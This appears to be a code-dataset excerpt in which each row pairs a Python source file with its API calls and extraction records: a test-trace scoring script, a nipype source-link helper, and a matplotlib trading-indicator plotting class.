| code (string, 22 to 1.05M chars) | apis (list, 1 to 3.31k items) | extract_api (string, 75 to 3.25M chars) |
|---|---|---|
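Each row below pairs a Python source file (`code`) with the fully-qualified callables it uses (`apis`) and per-call extraction records (`extract_api`) that appear to carry character offsets into the source, the reconstructed call expression, its parsed arguments, and the import statement that provides it. A minimal parsing sketch, assuming the cells round-trip as plain strings of Python literals (the exact loader depends on how this dump was exported, and the column semantics are inferred from the rows shown, not from a documented schema):

```python
# Minimal sketch of reading one row; the cell format is an assumption inferred
# from the rows shown below, not a documented schema.
import ast

def parse_row(code: str, apis: str, extract_api: str):
    api_names = ast.literal_eval(apis)            # e.g. ["argparse.ArgumentParser", ...]
    call_records = ast.literal_eval(extract_api)  # list of per-call tuples
    calls = [
        # (qualified name, call-site slice of the source, providing import line)
        (rec[1], code[rec[0][0]:rec[0][1]], rec[-1])
        for rec in call_records
    ]
    return api_names, calls
```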
from typing import Iterator, Tuple, Set, List, Dict, Any, Optional, Type
import logging
import subprocess
import pexpect
import tempfile
import os
import json
import csv
import attr
import functools
import time
import math
import argparse
import concurrent.futures
from ruamel.yaml import YAML
from ground_truth import DatabaseEntry
from compare_traces import load_file
from hash_mutants import mutation_to_uid
from verify_test_data import VerifiedEntry, NewDatabaseEntry, Status
from filter_truth import VALID_LIST_OUTPUT
from enum import Enum
logger = logging.getLogger("houston") # type: logging.Logger
logger.setLevel(logging.DEBUG)
def setup_logging(verbose: bool = False) -> None:
log_to_stdout = logging.StreamHandler()
log_to_stdout.setLevel(logging.DEBUG if verbose else logging.INFO)
logger.addHandler(log_to_stdout)  # logger is already the 'houston' logger, so add the handler only once
def setup_arg_parser():
parser = argparse.ArgumentParser(description='Validate test traces')
parser.add_argument('database', type=str, action='store',
help='path to test database yaml file.')
parser.add_argument('daikon_out', type=str, action='store',
help='path to the output invariant checker')
parser.add_argument('nonce_file', type=str, action='store',
help='path to nonce file.')
parser.add_argument('ground_truth', type=str, action='store',
help='path to ground truth traces')
parser.add_argument('output', action='store', type=str,
help='the file where the results will be stored')
parser.add_argument('--verbose', action='store_true',
help='increases logging verbosity.')
parser.add_argument('--compute-score', action='store',
default='',
help='path to a csv file to add the accuracy results')
args = parser.parse_args()
return args
def compute_score(entries: List[NewDatabaseEntry],
score_file: str = '',
models_dir: str = '') -> None:
tp, fp, tn, fn = 0, 0, 0, 0
for o, t in entries:
if Status.REJECTED in o.verified:
fp += 1
else:
tn += 1
if Status.REJECTED in t.verified:
tp += 1
else:
fn += 1
logger.info("TP: %d, TN: %d, FP: %d, FN: %d", tp, tn, fp, fn)
precision = float(tp)/float(tp + fp) if tp+fp != 0 else float('nan')
recall = float(tp)/float(tp + fn) if tp+fn != 0 else float('nan')
f_score = (2 * tp) / (2 * tp + fp + fn) if (tp + fp + fn) else float('nan')
logger.info("Precision: %f\nRecall: %f\nF-score: %f",
precision, recall, f_score)
if not score_file:
return
typ = 'daikon'
seed = os.path.basename(os.path.dirname(models_dir))
data_amount = os.path.basename(os.path.dirname(os.path.dirname(models_dir)))
with open(score_file, 'a') as f:
f.write(', '.join([data_amount, seed, typ, '-', str(tp), str(tn), str(fp), str(fn),
str(precision), str(recall), str(f_score)]))
f.write('\n')
if __name__=="__main__":
args = setup_arg_parser()
setup_logging(args.verbose)
results = []
with open(args.database, 'r') as f:
db = YAML().load(f)
with open(args.daikon_out, 'r') as f:
invalidated = YAML().load(f)
with open(args.nonce_file, 'r') as f:
fn_to_nonce = YAML().load(f)
with open(os.path.join(args.ground_truth, VALID_LIST_OUTPUT), 'r') as f:
all_truth = YAML().load(f)
all_truth = [os.path.join(args.ground_truth, t) for t in all_truth]
entries = [DatabaseEntry.from_dict(e) for e in db['entries'] if e['inconsistent']]
logger.info("starting with %d mutants", len(entries))
traces = []
for entry in entries:
for _, trace_fn in entry.fn_inconsistent_traces:
trace = VerifiedEntry(trace_fn,
[Status.REJECTED if n in invalidated else Status.ACCEPTED for n in fn_to_nonce[trace_fn]])
traces.append(trace)
oracles = []
for oracle_fn in all_truth[:len(traces)]:
oracle = VerifiedEntry(oracle_fn,
[Status.REJECTED if n in invalidated else Status.ACCEPTED for n in fn_to_nonce[oracle_fn]])
oracles.append(oracle)
validated_results = list(zip(oracles, traces))
logger.debug("finished evaluating %d", len(validated_results))
jsn = {
'oracle-directory': db['oracle-directory'],
'snapshot': db['snapshot'],
'entries': [e.to_dict() for e in validated_results]
}
with open(args.output, 'w') as f:
YAML().dump(jsn, f)
logger.info("wrote results to file")
if args.compute_score:
compute_score(validated_results,
args.compute_score,
args.daikon_out)
else:
compute_score(validated_results)
|
[
"argparse.ArgumentParser",
"os.path.dirname",
"logging.StreamHandler",
"ruamel.yaml.YAML",
"verify_test_data.VerifiedEntry",
"ground_truth.DatabaseEntry.from_dict",
"os.path.join",
"logging.getLogger"
] |
[((559, 587), 'logging.getLogger', 'logging.getLogger', (['"""houston"""'], {}), "('houston')\n", (576, 587), False, 'import logging\n'), ((715, 738), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (736, 738), False, 'import logging\n'), ((945, 1004), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Validate test traces"""'}), "(description='Validate test traces')\n", (968, 1004), False, 'import argparse\n'), ((2851, 2878), 'os.path.dirname', 'os.path.dirname', (['models_dir'], {}), '(models_dir)\n', (2866, 2878), False, 'import os\n'), ((3649, 3683), 'os.path.join', 'os.path.join', (['args.ground_truth', 't'], {}), '(args.ground_truth, t)\n', (3661, 3683), False, 'import os\n'), ((3721, 3747), 'ground_truth.DatabaseEntry.from_dict', 'DatabaseEntry.from_dict', (['e'], {}), '(e)\n', (3744, 3747), False, 'from ground_truth import DatabaseEntry\n'), ((4232, 4355), 'verify_test_data.VerifiedEntry', 'VerifiedEntry', (['oracle_fn', '[(Status.REJECTED if n in invalidated else Status.ACCEPTED) for n in\n fn_to_nonce[oracle_fn]]'], {}), '(oracle_fn, [(Status.REJECTED if n in invalidated else Status.\n ACCEPTED) for n in fn_to_nonce[oracle_fn]])\n', (4245, 4355), False, 'from verify_test_data import VerifiedEntry, NewDatabaseEntry, Status\n'), ((851, 879), 'logging.getLogger', 'logging.getLogger', (['"""houston"""'], {}), "('houston')\n", (868, 879), False, 'import logging\n'), ((2931, 2958), 'os.path.dirname', 'os.path.dirname', (['models_dir'], {}), '(models_dir)\n', (2946, 2958), False, 'import os\n'), ((3534, 3584), 'os.path.join', 'os.path.join', (['args.ground_truth', 'VALID_LIST_OUTPUT'], {}), '(args.ground_truth, VALID_LIST_OUTPUT)\n', (3546, 3584), False, 'import os\n'), ((3972, 4093), 'verify_test_data.VerifiedEntry', 'VerifiedEntry', (['trace_fn', '[(Status.REJECTED if n in invalidated else Status.ACCEPTED) for n in\n fn_to_nonce[trace_fn]]'], {}), '(trace_fn, [(Status.REJECTED if n in invalidated else Status.\n ACCEPTED) for n in fn_to_nonce[trace_fn]])\n', (3985, 4093), False, 'from verify_test_data import VerifiedEntry, NewDatabaseEntry, Status\n'), ((3344, 3350), 'ruamel.yaml.YAML', 'YAML', ([], {}), '()\n', (3348, 3350), False, 'from ruamel.yaml import YAML\n'), ((3424, 3430), 'ruamel.yaml.YAML', 'YAML', ([], {}), '()\n', (3428, 3430), False, 'from ruamel.yaml import YAML\n'), ((3504, 3510), 'ruamel.yaml.YAML', 'YAML', ([], {}), '()\n', (3508, 3510), False, 'from ruamel.yaml import YAML\n'), ((3617, 3623), 'ruamel.yaml.YAML', 'YAML', ([], {}), '()\n', (3621, 3623), False, 'from ruamel.yaml import YAML\n'), ((4747, 4753), 'ruamel.yaml.YAML', 'YAML', ([], {}), '()\n', (4751, 4753), False, 'from ruamel.yaml import YAML\n')]
|
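As a quick sanity check on the scoring logic in compute_score above, a worked example with illustrative counts (the numbers are made up, not taken from any run):

```python
# Illustrative counts only; mirrors the formulas used in compute_score above.
tp, tn, fp, fn = 8, 6, 2, 4
precision = tp / (tp + fp)                 # 8 / 10  = 0.8
recall = tp / (tp + fn)                    # 8 / 12  ~ 0.667
f_score = (2 * tp) / (2 * tp + fp + fn)    # 16 / 22 ~ 0.727
print(precision, recall, f_score)
```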
"""Build a file URL."""
import os
import inspect
import subprocess
REVISION_CMD = "git rev-parse --short HEAD"
def _get_git_revision():
# Comes from scikit-learn
# https://github.com/scikit-learn/scikit-learn/blob/master/doc/sphinxext/github_link.py
try:
revision = subprocess.check_output(REVISION_CMD.split()).strip()
except (subprocess.CalledProcessError, OSError):
return None
return revision.decode("utf-8")
def get_url(obj):
"""Return local or remote url for an object."""
filename = inspect.getsourcefile(obj)
uri = "file://%s" % filename
revision = _get_git_revision()
if revision is not None:
shortfile = os.path.join("nipype", filename.split("nipype/")[-1])
uri = "http://github.com/nipy/nipype/blob/%s/%s" % (revision, shortfile,)
lines, lstart = inspect.getsourcelines(obj)
lend = len(lines) + lstart
return "%s#L%d-L%d" % (uri, lstart, lend)
|
[
"inspect.getsourcelines",
"inspect.getsourcefile"
] |
[((539, 565), 'inspect.getsourcefile', 'inspect.getsourcefile', (['obj'], {}), '(obj)\n', (560, 565), False, 'import inspect\n'), ((839, 866), 'inspect.getsourcelines', 'inspect.getsourcelines', (['obj'], {}), '(obj)\n', (861, 866), False, 'import inspect\n')]
|
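A hedged usage sketch for get_url above: it assumes nipype is installed and uses IdentityInterface purely as an example of an importable object whose source inspect can locate; the resulting URL shape comes from the function itself.

```python
# Hedged sketch: nipype and the chosen class are assumptions used only for
# illustration; any object with retrievable source works.
from nipype.interfaces.utility import IdentityInterface

print(get_url(IdentityInterface))
# -> http://github.com/nipy/nipype/blob/<short-rev>/nipype/interfaces/utility/...#L<start>-L<end>
# Falls back to a plain file:// URI when no git revision can be resolved.
```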
"""Plots (and/or saves) the graphical trading data using Matplotlib"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from models.Trading import TechnicalAnalysis
import datetime, re, sys
sys.path.append('.')
class TradingGraphs():
def __init__(self, technicalAnalysis):
"""Trading Graphs object model
Parameters
----------
technicalAnalysis : object
TechnicalAnalysis object to provide the trading data to visualise
"""
# validates the technicalAnalysis object
if not isinstance(technicalAnalysis, TechnicalAnalysis):
raise TypeError('TechnicalAnalysis object required.')
# only one figure can be open at a time, close all open figures
plt.close('all')
self.technicalAnalysis = technicalAnalysis
# stores the pandas dataframe from technicalAnalysis object
self.df = technicalAnalysis.getDataFrame()
# stores the support and resistance levels from technicalAnalysis object
self.levels = technicalAnalysis.supportResistanceLevels()
# seaborn style plots
plt.style.use('seaborn')
def renderBuySellSignalEMA1226(self, saveFile='', saveOnly=False):
"""Render the EMA12 and EMA26 buy and sell signals
Parameters
----------
saveFile : str, optional
Save the figure
saveOnly : bool
Save the figure without displaying it
"""
buysignals = self.df[self.df.ema12gtema26co == True]
sellsignals = self.df[self.df.ema12ltema26co == True]
plt.subplot(111)
plt.plot(self.df.close, label="price", color="royalblue")
plt.plot(self.df.ema12, label="ema12", color="orange")
plt.plot(self.df.ema26, label="ema26", color="purple")
plt.ylabel('Price')
for idx in buysignals.index.tolist():
plt.axvline(x=idx, color='green')
for idx in sellsignals.index.tolist():
plt.axvline(x=idx, color='red')
plt.xticks(rotation=90)
plt.tight_layout()
plt.legend()
try:
if saveFile != '':
plt.savefig(saveFile)
except OSError:
raise SystemExit('Unable to save: ', saveFile)
if saveOnly == False:
plt.show()
def renderBuySellSignalEMA1226MACD(self, saveFile='', saveOnly=False):
"""Render the EMA12, EMA26 and MACD buy and sell signals
Parameters
----------
saveFile : str, optional
Save the figure
saveOnly : bool
Save the figure without displaying it
"""
buysignals = ((self.df.ema12gtema26co == True) & (self.df.macdgtsignal == True) & (self.df.obv_pc >= 2)) | ((self.df.ema12gtema26 == True) & (self.df.macdgtsignal == True) & (self.df.obv_pc >= 5))
sellsignals = ((self.df.ema12ltema26co == True) & (self.df.macdltsignal == True)) | ((self.df.ema12gtema26 == True) & (self.df.macdltsignal == True) & (self.df.obv_pc < 0))
df_signals = self.df[(buysignals) | (sellsignals)]
ax1 = plt.subplot(211)
plt.plot(self.df.close, label="price", color="royalblue")
plt.plot(self.df.ema12, label="ema12", color="orange")
plt.plot(self.df.ema26, label="ema26", color="purple")
plt.ylabel('Price')
action = ''
last_action = ''
for idx, row in df_signals.iterrows():
if row['ema12gtema26co'] == True and row['macdgtsignal'] == True and last_action != 'buy':
action = 'buy'
plt.axvline(x=idx, color='green')
elif row['ema12ltema26'] == True and row['macdltsignal'] == True and action == 'buy':
action = 'sell'
plt.axvline(x=idx, color='red')
last_action = action
plt.xticks(rotation=90)
plt.subplot(212, sharex=ax1)
plt.plot(self.df.macd, label="macd")
plt.plot(self.df.signal, label="signal")
plt.legend()
plt.ylabel('Divergence')
plt.xticks(rotation=90)
plt.tight_layout()
plt.legend()
try:
if saveFile != '':
plt.savefig(saveFile)
except OSError:
raise SystemExit('Unable to save: ', saveFile)
if saveOnly == False:
plt.show()
def renderPriceEMA12EMA26(self, saveFile='', saveOnly=False):
"""Render the price, EMA12 and EMA26
Parameters
----------
saveFile : str, optional
Save the figure
saveOnly : bool
Save the figure without displaying it
"""
plt.subplot(111)
plt.plot(self.df.close, label="price")
plt.plot(self.df.ema12, label="ema12")
plt.plot(self.df.ema26, label="ema26")
plt.legend()
plt.ylabel('Price')
plt.xticks(rotation=90)
plt.tight_layout()
try:
if saveFile != '':
plt.savefig(saveFile)
except OSError:
raise SystemExit('Unable to save: ', saveFile)
if saveOnly == False:
plt.show()
def renderPriceSupportResistance(self, saveFile='', saveOnly=False):
"""Render the price, support and resistance levels
Parameters
----------
saveFile : str, optional
Save the figure
saveOnly : bool
Save the figure without displaying it
"""
plt.subplot(111)
plt.plot(self.df.close)
plt.ylabel('Price')
for level in self.levels:
plt.axhline(y=level, color='grey')
plt.xticks(rotation=90)
plt.tight_layout()
try:
if saveFile != '':
plt.savefig(saveFile)
except OSError:
raise SystemExit('Unable to save: ', saveFile)
if saveOnly == False:
plt.show()
def renderEMAandMACD(self, period=30, saveFile='', saveOnly=False):
"""Render the price, EMA12, EMA26 and MACD
Parameters
----------
saveFile : str, optional
Save the figure
saveOnly : bool
Save the figure without displaying it
"""
if not isinstance(period, int):
raise TypeError('Period parameter is not an integer.')
if period < 1 or period > len(self.df):
raise ValueError('Period is out of range')
df_subset = self.df.iloc[-period::]
date = pd.to_datetime(df_subset.index).to_pydatetime()
df_subset_length = len(df_subset)
indices = np.arange(df_subset_length) # the evenly spaced plot indices
def format_date(x, pos=None): #pylint: disable=unused-argument
thisind = np.clip(int(x + 0.5), 0, df_subset_length - 1)
return date[thisind].strftime('%Y-%m-%d %H:%M:%S')
fig, (ax1, ax2) = plt.subplots(nrows=2, figsize=(12, 6))
fig.suptitle(df_subset.iloc[0]['market'] + ' | ' + str(df_subset.iloc[0]['granularity']), fontsize=16)
plt.style.use('seaborn')
plt.xticks(rotation=90)
#plt.tight_layout()
indices = np.arange(len(df_subset))
ax1.plot(indices, df_subset['close'], label='price', color='royalblue')
ax1.plot(indices, df_subset['ema12'], label='ema12', color='orange')
ax1.plot(indices, df_subset['ema26'], label='ema26', color='purple')
ax1.xaxis.set_major_formatter(ticker.FuncFormatter(format_date))
ax1.set_title('Price, EMA12 and EMA26')
ax1.set_ylabel('Price')
ax1.legend()
fig.autofmt_xdate()
ax2.plot(indices, df_subset.macd, label='macd')
ax2.plot(indices, df_subset.signal, label='signal')
ax2.xaxis.set_major_formatter(ticker.FuncFormatter(format_date))
ax2.set_title('MACD')
ax2.set_ylabel('Divergence')
ax2.legend()
fig.autofmt_xdate()
try:
if saveFile != '':
plt.savefig(saveFile)
except OSError:
raise SystemExit('Unable to save: ', saveFile)
if saveOnly == False:
plt.show()
def renderSeasonalARIMAModel(self, saveFile='', saveOnly=False):
"""Render the seasonal ARIMA model
Parameters
----------
saveFile : str, optional
Save the figure
saveOnly : bool
Save the figure without displaying it
"""
fittedValues = self.technicalAnalysis.seasonalARIMAModelFittedValues()
plt.plot(self.df['close'], label='original')
plt.plot(fittedValues, color='red', label='fitted')
plt.title('RSS: %.4f' % sum((fittedValues-self.df['close'])**2))
plt.legend()
plt.ylabel('Price')
plt.xticks(rotation=90)
plt.tight_layout()
try:
if saveFile != '':
plt.savefig(saveFile)
except OSError:
raise SystemExit('Unable to save: ', saveFile)
if saveOnly == False:
plt.show()
def renderSeasonalARIMAModelPredictionDays(self, days=30, saveFile='', saveOnly=False):
"""Render the seasonal ARIMA model prediction
Parameters
----------
days : int
Number of days to predict
saveFile : str, optional
Save the figure
saveOnly : bool
Save the figure without displaying it
"""
results_ARIMA = self.technicalAnalysis.seasonalARIMAModel()
df = pd.DataFrame(self.df['close'])
start_date = df.last_valid_index()
end_date = start_date + datetime.timedelta(days=days)
pred = results_ARIMA.predict(start=str(start_date), end=str(end_date), dynamic=True)
plt.plot(pred, label='prediction')
plt.ylabel('Price')
plt.xlabel('Days')
plt.xticks(rotation=90)
plt.tight_layout()
try:
if saveFile != '':
plt.savefig(saveFile)
except OSError:
raise SystemExit('Unable to save: ', saveFile)
if saveOnly == False:
plt.show()
def renderSMAandMACD(self, saveFile='', saveOnly=False):
"""Render the price, SMA20, SMA50, and SMA200
Parameters
----------
saveFile : str, optional
Save the figure
saveOnly : bool
Save the figure without displaying it
"""
ax1 = plt.subplot(211)
plt.plot(self.df.close, label="price")
plt.plot(self.df.sma20, label="sma20")
plt.plot(self.df.sma50, label="sma50")
plt.plot(self.df.sma200, label="sma200")
plt.legend()
plt.ylabel('Price')
plt.xticks(rotation=90)
plt.subplot(212, sharex=ax1)
plt.plot(self.df.macd, label="macd")
plt.plot(self.df.signal, label="signal")
plt.legend()
plt.ylabel('Price')
plt.xlabel('Days')
plt.xticks(rotation=90)
plt.tight_layout()
try:
if saveFile != '':
plt.savefig(saveFile)
except OSError:
raise SystemExit('Unable to save: ', saveFile)
if saveOnly == False:
plt.show()
def renderEMA12EMA26CloseCandles(self, period=30, outputpng=''):
if not isinstance(period, int):
raise TypeError('Period parameter is not an integer.')
if period < 1 or period > len(self.df):
raise ValueError('Period is out of range')
df_subset = self.df.iloc[-period::]
fig, axes = plt.subplots(ncols=1, figsize=(12, 6)) #pylint: disable=unused-variable
fig.autofmt_xdate()
ax1 = plt.subplot(111)
ax1.set_title(df_subset.iloc[0]['market'] + ' | ' + str(df_subset.iloc[0]['granularity']))
plt.style.use('seaborn')
plt.plot(df_subset['close'], label='price', color='royalblue')
plt.plot(df_subset['ema12'], label='ema12', color='orange')
plt.plot(df_subset['ema26'], label='ema26', color='purple')
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom=False, # ticks along the bottom edge are off
top=False, # ticks along the top edge are off
labelbottom=False) # labels along the bottom edge are off
df_candlestick = self.df[self.df['three_white_soldiers'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'gx')
df_candlestick = self.df[self.df['three_black_crows'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'rx')
df_candlestick = self.df[self.df['inverted_hammer'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'g^')
df_candlestick = self.df[self.df['hammer'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'rv')
df_candlestick = self.df[self.df['hanging_man'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'go')
df_candlestick = self.df[self.df['shooting_star'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'r*')
df_candlestick = self.df[self.df['doji'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'yd')
df_candlestick = self.df[self.df['three_line_strike'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'y^')
df_candlestick = self.df[self.df['two_black_gapping'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'yv')
df_candlestick = self.df[self.df['evening_star'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'mv')
df_candlestick = self.df[self.df['abandoned_baby'] == True]
df_candlestick_in_range = df_candlestick[df_candlestick.index >= np.min(df_subset.index)]
for idx in df_candlestick_in_range.index.tolist():
plt.plot(idx, df_candlestick_in_range.loc[idx]['close'], 'm^')
plt.ylabel('Price')
plt.xticks(rotation=90)
plt.tight_layout()
plt.legend()
if outputpng != '':
plt.savefig(outputpng)
plt.show()
|
[
"matplotlib.pyplot.style.use",
"numpy.arange",
"matplotlib.pyplot.tick_params",
"matplotlib.pyplot.tight_layout",
"sys.path.append",
"pandas.DataFrame",
"matplotlib.pyplot.axvline",
"matplotlib.pyplot.close",
"datetime.timedelta",
"matplotlib.pyplot.xticks",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.axhline",
"matplotlib.pyplot.show",
"matplotlib.pyplot.legend",
"numpy.min",
"matplotlib.ticker.FuncFormatter",
"pandas.to_datetime",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.savefig"
] |
[((248, 268), 'sys.path.append', 'sys.path.append', (['"""."""'], {}), "('.')\n", (263, 268), False, 'import datetime, re, sys\n'), ((799, 815), 'matplotlib.pyplot.close', 'plt.close', (['"""all"""'], {}), "('all')\n", (808, 815), True, 'import matplotlib.pyplot as plt\n'), ((1175, 1199), 'matplotlib.pyplot.style.use', 'plt.style.use', (['"""seaborn"""'], {}), "('seaborn')\n", (1188, 1199), True, 'import matplotlib.pyplot as plt\n'), ((1659, 1675), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (1670, 1675), True, 'import matplotlib.pyplot as plt\n'), ((1684, 1741), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.close'], {'label': '"""price"""', 'color': '"""royalblue"""'}), "(self.df.close, label='price', color='royalblue')\n", (1692, 1741), True, 'import matplotlib.pyplot as plt\n'), ((1750, 1804), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.ema12'], {'label': '"""ema12"""', 'color': '"""orange"""'}), "(self.df.ema12, label='ema12', color='orange')\n", (1758, 1804), True, 'import matplotlib.pyplot as plt\n'), ((1813, 1867), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.ema26'], {'label': '"""ema26"""', 'color': '"""purple"""'}), "(self.df.ema26, label='ema26', color='purple')\n", (1821, 1867), True, 'import matplotlib.pyplot as plt\n'), ((1876, 1895), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Price"""'], {}), "('Price')\n", (1886, 1895), True, 'import matplotlib.pyplot as plt\n'), ((2090, 2113), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (2100, 2113), True, 'import matplotlib.pyplot as plt\n'), ((2122, 2140), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (2138, 2140), True, 'import matplotlib.pyplot as plt\n'), ((2149, 2161), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (2159, 2161), True, 'import matplotlib.pyplot as plt\n'), ((3189, 3205), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(211)'], {}), '(211)\n', (3200, 3205), True, 'import matplotlib.pyplot as plt\n'), ((3214, 3271), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.close'], {'label': '"""price"""', 'color': '"""royalblue"""'}), "(self.df.close, label='price', color='royalblue')\n", (3222, 3271), True, 'import matplotlib.pyplot as plt\n'), ((3280, 3334), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.ema12'], {'label': '"""ema12"""', 'color': '"""orange"""'}), "(self.df.ema12, label='ema12', color='orange')\n", (3288, 3334), True, 'import matplotlib.pyplot as plt\n'), ((3343, 3397), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.ema26'], {'label': '"""ema26"""', 'color': '"""purple"""'}), "(self.df.ema26, label='ema26', color='purple')\n", (3351, 3397), True, 'import matplotlib.pyplot as plt\n'), ((3406, 3425), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Price"""'], {}), "('Price')\n", (3416, 3425), True, 'import matplotlib.pyplot as plt\n'), ((3924, 3947), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (3934, 3947), True, 'import matplotlib.pyplot as plt\n'), ((3957, 3985), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(212)'], {'sharex': 'ax1'}), '(212, sharex=ax1)\n', (3968, 3985), True, 'import matplotlib.pyplot as plt\n'), ((3994, 4030), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.macd'], {'label': '"""macd"""'}), "(self.df.macd, label='macd')\n", (4002, 4030), True, 'import matplotlib.pyplot as plt\n'), ((4039, 4079), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.signal'], {'label': '"""signal"""'}), "(self.df.signal, 
label='signal')\n", (4047, 4079), True, 'import matplotlib.pyplot as plt\n'), ((4088, 4100), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (4098, 4100), True, 'import matplotlib.pyplot as plt\n'), ((4109, 4133), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Divergence"""'], {}), "('Divergence')\n", (4119, 4133), True, 'import matplotlib.pyplot as plt\n'), ((4142, 4165), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (4152, 4165), True, 'import matplotlib.pyplot as plt\n'), ((4175, 4193), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (4191, 4193), True, 'import matplotlib.pyplot as plt\n'), ((4202, 4214), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (4212, 4214), True, 'import matplotlib.pyplot as plt\n'), ((4760, 4776), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (4771, 4776), True, 'import matplotlib.pyplot as plt\n'), ((4785, 4823), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.close'], {'label': '"""price"""'}), "(self.df.close, label='price')\n", (4793, 4823), True, 'import matplotlib.pyplot as plt\n'), ((4832, 4870), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.ema12'], {'label': '"""ema12"""'}), "(self.df.ema12, label='ema12')\n", (4840, 4870), True, 'import matplotlib.pyplot as plt\n'), ((4879, 4917), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.ema26'], {'label': '"""ema26"""'}), "(self.df.ema26, label='ema26')\n", (4887, 4917), True, 'import matplotlib.pyplot as plt\n'), ((4926, 4938), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (4936, 4938), True, 'import matplotlib.pyplot as plt\n'), ((4947, 4966), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Price"""'], {}), "('Price')\n", (4957, 4966), True, 'import matplotlib.pyplot as plt\n'), ((4975, 4998), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (4985, 4998), True, 'import matplotlib.pyplot as plt\n'), ((5007, 5025), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (5023, 5025), True, 'import matplotlib.pyplot as plt\n'), ((5583, 5599), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (5594, 5599), True, 'import matplotlib.pyplot as plt\n'), ((5608, 5631), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.close'], {}), '(self.df.close)\n', (5616, 5631), True, 'import matplotlib.pyplot as plt\n'), ((5640, 5659), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Price"""'], {}), "('Price')\n", (5650, 5659), True, 'import matplotlib.pyplot as plt\n'), ((5751, 5774), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (5761, 5774), True, 'import matplotlib.pyplot as plt\n'), ((5783, 5801), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (5799, 5801), True, 'import matplotlib.pyplot as plt\n'), ((6733, 6760), 'numpy.arange', 'np.arange', (['df_subset_length'], {}), '(df_subset_length)\n', (6742, 6760), True, 'import numpy as np\n'), ((7026, 7064), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(2)', 'figsize': '(12, 6)'}), '(nrows=2, figsize=(12, 6))\n', (7038, 7064), True, 'import matplotlib.pyplot as plt\n'), ((7184, 7208), 